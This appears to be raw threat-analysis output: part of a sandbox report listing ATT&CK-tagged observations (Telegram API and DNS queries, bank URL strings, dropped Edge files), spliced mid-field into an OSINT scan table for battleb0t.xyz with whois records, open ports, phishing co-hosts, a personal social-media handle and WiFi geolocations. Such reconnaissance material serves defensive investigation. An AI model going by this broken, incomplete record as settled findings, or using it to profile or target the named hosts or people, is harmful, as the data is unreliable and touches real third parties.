u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:49742"\n "104.17.25.14:49744"\n "185.199.109.153:49746"\n "13.227.74.44:49747"\n "149.154.167.220:49748"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "cdnjs.cloudflare.com"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "aggiedashhelp@ucdavis.edu"\n Pattern match: "rrf@0.53"\n Pattern match: "rf@0.53"\n Pattern match: "rrf@0.11"\n Pattern match: "rf@0.11"\n Pattern match: "rrf@0.99"\n Pattern match: "rf@0.99"\n Pattern match: "rrf@0.78"\n Pattern match: "rf@0.78"\n Pattern match: "rrf@0.26"\n Pattern match: "rf@0.26"\n Pattern match: "rrf@0.25"\n Pattern match: "rf@0.25"\n Pattern match: "rrf@0.13"\n Pattern match: "rf@0.13"\n Pattern match: "rrf@0.17"\n Pattern match: "rf@0.17"\n Pattern match: "rrf@0.66"\n Pattern match: "rf@0.66"\n Pattern match: "rrf@0.36"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"facebook.com" (Indicator: "facebook.com")\n "netflix.com" (Indicator: "netflix.com")\n "youtube.com" (Indicator: "youtube")\n "twitter.com" (Indicator: "twitter")\n "www.netflix.com" (Indicator: "netflix.com")\n "www.facebook.com" (Indicator: "facebook.com")\n "You can add Flipgrid and YouTube videos to PDFs as comments.We would love to hear any enhancements you would like to see in this feature. Please use the send feedback option or tweet with #EdgeEdu #EdgeCamera)PresentComment SavedComment DeletedThis file is password protected. 
Please enter a password to open the file.Enter a passwordCheck your passwordWe can\'t open this fileSign in to open this fileThis is a protected file. Sign in with your work or school account to open it.Need permissionsContact the owner of the file to give you permissions.Switch to a work or school accountThis file is protected. To open it, go to Settings and more" (Indicator: "youtube")\n "px.ads.linkedin.com" (Indicator: "linkedin.com")\n "ds.linkedin.com" (Indicator: "linkedin.com")\n "https://px.ads.linkedin.com:443,*" (Indicator: "linkedin.com")\n "settings.force_youtube_restrict" (Indicator: "youtube")\n "YouTube-Restrict" (Indicator: "youtube")\n "https://*.facebook.com/*" (Indicator: "facebook.com")\n "(.*\\/\\/.*linkedin.com\\/jobs\\/view\\/.*|.*\\/\\/.*linkedin.com\\/jobs\\/collections\\/.*currentjobid=.*|.*\\/\\/.*snagajob.com\\/jobs.*|.*\\/\\/.*careerbuilder.com\\/job\\/.*|.*\\/\\/.*monster.com\\/job-openings\\/*.*|.*\\/\\/.*ziprecruiter.com\\/c\\/.+?\\/Job\\/.*)" (Indicator: "linkedin.com")\n ".youtube.com" (Indicator: "youtube")\n "=facebook.com" (Indicator: "facebook.com")\n "ads-twitter.com/" (Indicator: "twitter")\n "twittercounter.com/" (Indicator: "twitter")\n "youtube.com/" (Indicator: "youtube")\n "twitter.jp/" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-146', u'name': u'Found named pipe like strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1570', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1570', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string - CHROME_CRASHPAD_PIPE_NAME=\\\\.\\pipe\\LOCAL\\crashpad_1572_AZVWUJPMBOHDUOUN\n Found string - \\\\.\\pipe\\LOCAL\\crashpad_1572_AZVWUJPMBOHDUOUN\n Found string - \\\\.\\pipe\\%ls\\%ls\n Found string - \\\\.\\pipe\\LOCAL\\crashpad_%lu_\n Found string - \\Dev\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Applicati\\\\.\\pipe\\LOCAL\\chrome.sync.\n 
Found string - \\\\.\\pipe\\LOCAL\\edge.sync.\n Found string - \\\\.\\pipe\\LOCAL\\chrome.sync.\n Found string - \\\\\\\\.\\pipe\\LOCAL\\edge.sync.\n Found string - \\\\.\\pipe\\\\??\\pipe\\chrome.\n Found string - \\\\.\\pipe\\LOCA\\??\\pipe\\edge.\n Found string - \\\\\\\\.\\pipe\\\\??\\pipe\\chrome.\n Found string - \\Dev\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\.\\pipe\\LOCAL\\edge.sync.\n Found string - \\Dev\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\.\\pipe\\\\??\\pipe\\chrome.'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-154', u'name': u'Found suspicious keywords in script (string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed keyword:"WinHTTP" [Source: 00000000-00001572.00000000.75966.ADE46000.00000002.mdmp\n 00000000-00001572.00000001.77885.ADE46000.00000002.mdmp\n 00000000-00001572.00000002.79803.ADE46000.00000002.mdmp]'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"kyc.icicibank.com" (Source: 00000000-00001572.00000000.75966.0031C000.00000004.mdmp, 00000000-00001572.00000001.77885.01194000.00000004.mdmp, 00000000-00001572.00000001.77885.01270000.00000004.mdmp, 00000000-00001572.00000002.79803.01194000.00000004.mdmp, 00000000-00001572.00000002.79803.01270000.00000004.mdmp, Indicator: "icicibank.com")\n "buy.icicibank.com" (Source: 00000000-00001572.00000000.75966.0031C000.00000004.mdmp, 00000000-00001572.00000001.77885.01194000.00000004.mdmp, 00000000-00001572.00000001.77885.01270000.00000004.mdmp, 
00000000-00001572.00000002.79803.01194000.00000004.mdmp, 00000000-00001572.00000002.79803.01270000.00000004.mdmp, Indicator: "icicibank.com")\n "bmo.com" (Source: 00000000-00001572.00000000.75966.0031C000.00000004.mdmp, 00000000-00001572.00000001.77885.01194000.00000004.mdmp, 00000000-00001572.00000001.77885.01270000.00000004.mdmp, 00000000-00001572.00000002.79803.01194000.00000004.mdmp, 00000000-00001572.00000002.79803.01270000.00000004.mdmp, Indicator: "bmo.com")\n "genesishealthclubs.com/" (Source: 00000000-00001572.00000001.77885.0031C000.00000004.mdmp, 00000000-00001572.00000002.79803.0031C000.00000004.mdmp, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00001572]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1572_1550619549\\product_page.js]- [targetUID: 00000000-00001572]\n "2280391a-a00b-4307-9daf-4a0cf2eff0a0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00001572]\n "edge_autofill_global_block_list.json" has type "JSON data"- Location: [%TEMP%\\1572_918905705\\edge_autofill_global_block_list.json]- [targetUID: 00000000-00001572]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00001572]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\1572_677600543\\_metadata\\verified_contents.json]- [targetUID: 00000000-00001572]\n 
"75f02fdd-22ef-4746-8063-dfec8b5ab9ea.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\75f02fdd-22ef-4746-8063-dfec8b5ab9ea.tmp]- [targetUID: 00000000-00001572]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cf-ray: 7c5f60363a5a178c-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 122.48.229.35.bc.googleusercontent.com | 35.229.48.122 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.167): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:16 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:80 | 188.114.97.0/24 |
| 2023-05-12 03:17:37 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: ASHU.XYZ
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2023-03-28T08:17:54.0Z
Creation Date: 2022-03-03T09:34:10.0Z
Registry Expiry Date: 2024-03-03T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: GRACE.NS.CLOUDFLARE.COM
Name Server: LOGAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: ashu.xyz
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-02-22T23:31:01.00Z
Creation Date: 2022-03-03T09:34:10.00Z
Registrar Registration Expiration Date: 2024-03-03T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Name Server: grace.ns.cloudflare.com
Name Server: logan.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:17:37.40Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | ashu.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.60): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:8080 | 188.114.97.0/24 |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:8080 | 188.114.97.0/24 |
| 2023-05-12 02:54:54 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden<br>Date: <REDACTED><br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: close<br>X-Frame-Options: SAMEORIGIN<br>Referrer-Policy: same-origin<br>Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>Vary: Accept-Encoding<br>Server: cloudflare<br>CF-RAY: 7c552e7289ff8729-ORD<br>Content-Encoding: gzip | 2a06:98c1:3121::1 |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Instagram (Category: social)<br>https://instagram.com/dawidsulej | dawidsulej |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00ty.github.io]<br>https://www.openphish.com/feed.txt | 00ty.github.io |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 4170004919 (Net ID: 00:0B:6B:20:D9:EC) | 39.0469, -77.4903 |
| 2023-05-12 03:09:51 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.92 |
| 2023-05-12 02:54:15 | HTTP Headers | No | Web Spider | 8 | 0 | 2 | 0 | None | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} | www.battleb0t.xyz |
| 2023-05-12 02:44:15 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE070 (Net ID: 98:2C:BE:4F:F5:49) | 37.751, -97.822 |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 218.30.196.104.bc.googleusercontent.com | 104.196.30.218 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 124.97.148.34.bc.googleusercontent.com | 34.148.97.124 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.134): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Disqus (Category: social)<br>https://disqus.com/by/login/ | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-F8E2 (Net ID: 00:1D:D6:B4:F8:E0) | 32.8608, -79.9746 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EB:09:56) | 41.8781, -87.6298 |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 02:54:23 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2000::/35 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01010101coder.github.io |
| 2023-05-12 02:53:56 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T02:29:53.974Z", "ip": "2606:50c0:8001::153", "location_updated_at": "2023-05-09T09:29:28.098368Z", "autonomous_system_updated_at": "2023-05-09T09:29:28.098483Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"sweden.trans.healthcare": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:44:54.814877641Z"}, "www.sankalpsociety.in": {"record_type": "CNAME", "resolved_at": "2023-03-30T03:30:37.790561757Z"}, "alexsong.group": {"record_type": "AAAA", "resolved_at": "2023-04-07T17:20:01.599322255Z"}, "www.honestfarmer.in": {"record_type": "CNAME", "resolved_at": "2023-03-18T23:46:54.581846631Z"}, "caya-gutenberg.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-14T00:28:27.380989688Z"}, "fe.youyu.im": {"record_type": "CNAME", "resolved_at": "2023-03-05T16:23:47.675585567Z"}, "navi-baum-demo.giang-nguyen.com": {"record_type": "CNAME", "resolved_at": "2023-05-11T14:50:15.129872931Z"}, "www.consciouscamping.ie": {"record_type": "CNAME", "resolved_at": "2023-02-11T15:09:56.324722295Z"}, "danzetsu.biscuitt.in": {"record_type": "CNAME", "resolved_at": "2023-02-25T16:55:06.993306904Z"}, "blog.belsky.in": {"record_type": "CNAME", "resolved_at": "2023-03-30T03:27:06.776036239Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "www.aidbots.in": {"record_type": "CNAME", "resolved_at": "2023-04-11T18:20:04.915692018Z"}, "git.fred.im": {"record_type": "CNAME", "resolved_at": "2023-05-03T00:50:36.751035867Z"}, "www.arvindmehra.in": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:49:19.612171098Z"}, "www.chidkenuprarthanamandhira.in": {"record_type": "CNAME", 
"resolved_at": "2023-03-21T18:25:37.270541573Z"}, "sh11thead.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-08T13:53:23.227857044Z"}, "mint.gaiaprotocol.com": {"record_type": "CNAME", "resolved_at": "2023-05-07T14:38:55.332333650Z"}, "shashank.im": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:49:01.992957477Z"}, "www.labyr.in": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:43:44.082390542Z"}, "blog.xcatliu.com": {"record_type": "CNAME", "resolved_at": "2023-04-20T19:54:04.742624347Z"}, "guaifish.com": {"record_type": "CNAME", "resolved_at": "2023-02-24T13:51:15.431279411Z"}, "trantuanminh.com": {"record_type": "AAAA", "resolved_at": "2023-04-26T16:50:40.377931396Z"}, "tgd.telecomnancy.net": {"record_type": "CNAME", "resolved_at": "2023-04-23T20:23:42.968388426Z"}, "student.mathsoc.ie": {"record_type": "CNAME", "resolved_at": "2023-03-04T16:27:35.884914874Z"}, "championash5357.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-22T17:12:10.247998776Z"}, "chaos-cl.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-17T16:27:07.483105509Z"}, "www.iapt2.ru": {"record_type": "CNAME", "resolved_at": "2023-04-18T21:11:09.936338632Z"}, "xiongwen7.cn": {"record_type": "CNAME", "resolved_at": "2023-02-26T12:45:30.176581622Z"}, "space.dejvoss.cz": {"record_type": "CNAME", "resolved_at": "2022-09-24T15:17:43.470867813Z"}, "www.eofis.ie": {"record_type": "CNAME", "resolved_at": "2023-04-16T05:04:10.745054368Z"}, "www.effirod.in": {"record_type": "CNAME", "resolved_at": "2023-04-20T21:10:19.519636869Z"}, "blog.zheng.im": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:44:46.778861543Z"}, "www.yeezhang.im": {"record_type": "CNAME", "resolved_at": "2023-03-05T16:24:05.360687550Z"}, "www.croissantdao.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T14:18:31.428677841Z"}, "domlet.richplastow.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:55:59.508294762Z"}, "www.servermaya.web.id": {"record_type": 
"CNAME", "resolved_at": "2023-04-01T19:01:32.988717568Z"}, "decarola.lifesheets.app": {"record_type": "CNAME", "resolved_at": "2023-03-19T21:38:09.336334894Z"}, "www.get1mil.com": {"record_type": "CNAME", "resolved_at": "2023-03-07T13:53:16.151398146Z"}, "www.megalomania.icu": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:50:15.076942224Z"}, "montecarlo.mardh.eu": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:12:54.462076635Z"}, "polothil.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:13:36.027155340Z"}, "blog2.foxcii.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:20:31.600174494Z"}, "www.fx-businessintelligence.com": {"record_type": "CNAME", "resolved_at": "2022-11-03T13:15:19.928479843Z"}, "https://jaxyouthsurvey.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-18T16:09:45.376363389Z"}, "q42.github.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T21:14:14.876154310Z"}, "www.corefindings.com": {"record_type": "CNAME", "resolved_at": "2023-04-25T14:30:24.633859334Z"}, "blog.s-schoener.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T16:33:37.322972528Z"}, "www.gilsoffer.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:22:12.068548907Z"}, "www.frontendtesting.com": {"record_type": "CNAME", "resolved_at": "2023-03-04T14:07:21.806350891Z"}, "www.forexforyou.co.in": {"record_type": "CNAME", "resolved_at": "2022-12-18T14:45:47.847480431Z"}, "www.parmosense.jp": {"record_type": "CNAME", "resolved_at": "2023-05-01T17:45:06.831576093Z"}, "www.openpoint.ie": {"record_type": "CNAME", "resolved_at": "2023-04-26T18:20:10.169998436Z"}, "docs.cashwarden.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T00:14:00.447731445Z"}, "www.kattamzero.in": {"record_type": "CNAME", "resolved_at": "2022-12-22T14:48:29.799597358Z"}, "cbrcrtx.github.io": {"record_type": "AAAA", "resolved_at": "2023-02-27T16:15:18.542745453Z"}, "youge.icu": {"record_type": "CNAME", "resolved_at": 
